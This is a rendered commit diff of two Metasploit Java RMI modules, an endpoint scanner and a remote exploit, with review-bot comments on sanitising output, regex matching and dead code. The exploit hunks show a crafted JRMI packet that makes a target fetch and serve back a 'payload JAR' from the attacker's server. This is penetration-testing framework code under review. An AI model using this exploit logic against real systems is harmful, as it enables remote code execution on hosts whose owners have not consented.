Small updates to the rmi modules
parent
63ed7fcc8f
commit
4c2e1c2859
|
@ -48,14 +48,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if res and res =~ /^\x4e..([^\x00]+)\x00\x00/
|
||||
info = $1
|
||||
print_good("#{rhost}:#{rport} Java RMI Endpoint Detected (identified us as '#{info}')")
|
||||
report_service(:host => rhost, :port => rport, :name => "rmi", :info => "Java RMI Endpoint (identified us as #{info})")
|
||||
report_vuln(
|
||||
:host => rhost,
|
||||
:name => self.fullname,
|
||||
:port => rport,
|
||||
:info => "Identified Java RMI Endpoint",
|
||||
:refs => self.references
|
||||
)
|
||||
report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "Java RMI Endpoint")
|
||||
end
|
||||
|
||||
rescue ::Interrupt
|
||||
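Review bot: `info` is taken verbatim from the remote endpoint's reply, since `[^\x00]+` accepts any non-NUL byte, and it is interpolated into `print_good` and into the `:info` of the `report_service` call that carries it. A hostile or misbehaving endpoint can therefore put terminal control sequences or junk into the operator's console and the stored service record; restricting the value first closes that, e.g. `info = $1.gsub(/[^\x20-\x7e]/, '?')`. Separately, `.` does not match a `\n` byte without the `m` flag, so a reply whose two bytes after `\x4e` include 0x0a is silently missed; `/^\x4e..([^\x00]+)\x00\x00/m` avoids that. The rendered page has lost its +/- markers, so which `report_service` line is the new one is inferred, and the enclosing method starts and ends outside the hunk.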
|
|
|
@ -79,9 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 1
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
register_options( [ Opt::RPORT(1099) ], self.class)
|
||||
|
||||
register_autofilter_ports([ 1098, 1099 ])
|
||||
register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry })
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -101,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
packet[idx, find_me.length] = len + new_url
|
||||
|
||||
# write out minimal header and packet
|
||||
print_status("Sending request for #{new_url}")
|
||||
print_status("Connected and sending request for #{new_url}")
|
||||
#sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
|
||||
sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet);
|
||||
|
||||
|
@ -130,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Pragma' => 'no-cache'
|
||||
})
|
||||
|
||||
print_status("Replied to Request for Payload JAR")
|
||||
print_status("Replied to request for payload JAR")
|
||||
end
|
||||
end
|
||||
|
||||
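Review bot: The commented-out `#sock.put("JRMI" + [2].pack("n") + "K" + ...)` line is still carried above the live call in the third hunk; it repeats the same header in a second form and will drift from the real one. Delete it, keep the existing `# write out minimal header and packet` comment, and drop the stray trailing `;` so the line reads `sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet)`. In the constructor hunk, `%W{ rmi rmid java-rmi rmiregistry }` has nothing to interpolate, so `%w{ rmi rmid java-rmi rmiregistry }` states the intent more plainly. `exploit` begins inside the second hunk and its body continues outside the visible lines.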
|
|